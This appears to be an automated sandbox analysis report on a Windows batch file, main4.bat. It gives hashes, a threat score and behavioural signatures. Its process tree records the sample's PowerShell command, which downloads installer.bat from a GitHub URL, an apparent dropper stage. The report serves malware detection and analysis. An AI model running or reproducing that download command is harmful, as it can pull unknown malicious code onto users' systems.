Analysis
-
max time kernel
14s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
22-11-2024 04:20
Static task
static1
Behavioral task
behavioral1
Sample
main4.bat
Resource
win7-20241010-en
4 signatures
150 seconds
General
-
Target
main4.bat
-
Size
17KB
-
MD5
d2c79d02019fe6507207e4d57360c2d0
-
SHA1
58c6e205d730b3cdb1186d9c8618c891e6ddbcde
-
SHA256
900ec958cdc785121d2d7558256066e1189c709291245b4a1ffd4336ae2fc7b4
-
SHA512
20b38b3b3827c23df5a7c0fdce51524c6f4dc2192b139abef8156f69a25b263f1c5ce502cbd328a056d01396e83a6338e836a55f46a15ce7567313ad82549610
-
SSDEEP
192:p3U9MgR/KWzBkRIKxZnB2Gl/631wAZ/vhAaiU74/s7HKwSRBPJyU4dWfehLp/rh:C9Mk/p9kRIVHrEsvSRBPJy7Wfezh
Score
8/10
Malware Config
Signatures
-
pid Process 1516 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1516 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1516 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 392 wrote to memory of 1516 392 cmd.exe 30 PID 392 wrote to memory of 1516 392 cmd.exe 30 PID 392 wrote to memory of 1516 392 cmd.exe 30
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\main4.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:392 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-Webrequest 'https://raw.githubusercontent.com/walks111551/09672018256120856125/main/installer.bat' -OutFile installer.bat"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1516
-